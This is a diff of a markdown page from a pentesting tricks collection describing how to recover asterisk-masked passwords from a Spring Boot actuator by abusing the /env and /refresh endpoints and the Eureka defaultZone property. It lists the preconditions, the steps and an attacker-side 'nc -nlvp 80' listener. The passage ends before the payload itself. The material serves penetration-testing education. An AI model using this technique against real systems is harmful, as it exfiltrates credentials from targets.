luastan/tricks-content/1-web/3-tech/spring.md

 ### Obtain the Plaintext of the Password Desensitized by the Asterisk (method 2)

-When accessing the /env interface, the spring actuator will replace the attribute values ​​corresponding to some attribute names with sensitive keywords (such as password, secret) with * to achieve the effect of desensitization
+When accessing the `/env` interface, the spring actuator will replace the attribute values ​​corresponding to some attribute names with sensitive keywords (such as password, secret) with * to achieve the effect of desensitization

 #### Conditions of use:

-- GET request to the target website/env
+- GET request to the target website `/env`
-- can POST requests to the target website/env
+- Cans send POST requests to the target website `/env`
-- You can POST request the /refreshinterface refresh the configuration ( spring-boot-starter-actuatordependency exists)
+- You can send POST request to the `/refresh` interface to refresh the configuration (`spring-boot-starter-actuator` dependency exists)
-- The target uses a spring-cloud-starter-netflix-eureka-clientdependency.
+- The target uses a `spring-cloud-starter-netflix-eureka-client` dependency.
 - The target can request the attacker's server (the request can go out of the Internet)

 #### Steps to use:

 1. Find the property name you want to get
-   - GET requests the /envor /actuator/envinterface of the target website, search for ******keywords, and find the attribute name corresponding to the attribute value masked by the asterisk * to be obtained.
+   - GET requests the `/env` or `/actuator/env` interface of the target website, search for ******keywords, and find the attribute name corresponding to the attribute value masked by the asterisk * to be obtained.

 2. Use nc to listen for HTTP requests
    - Listen to port 80 on the external network server controlled by yourself.
 It can be your Burp collaborator, interact.sh, the classic `nc -nlvp 80` or `httpdump :80` ([httpdump on Github](https://github.com/luastan/httpdump))

-3. Set the eureka.client.serviceUrl.defaultZone property
+3. Set the `eureka.client.serviceUrl.defaultZone` property
    - Replace in the following with the attribute name masked by the corresponding asterisk* you want to get:

 **spring 1.x**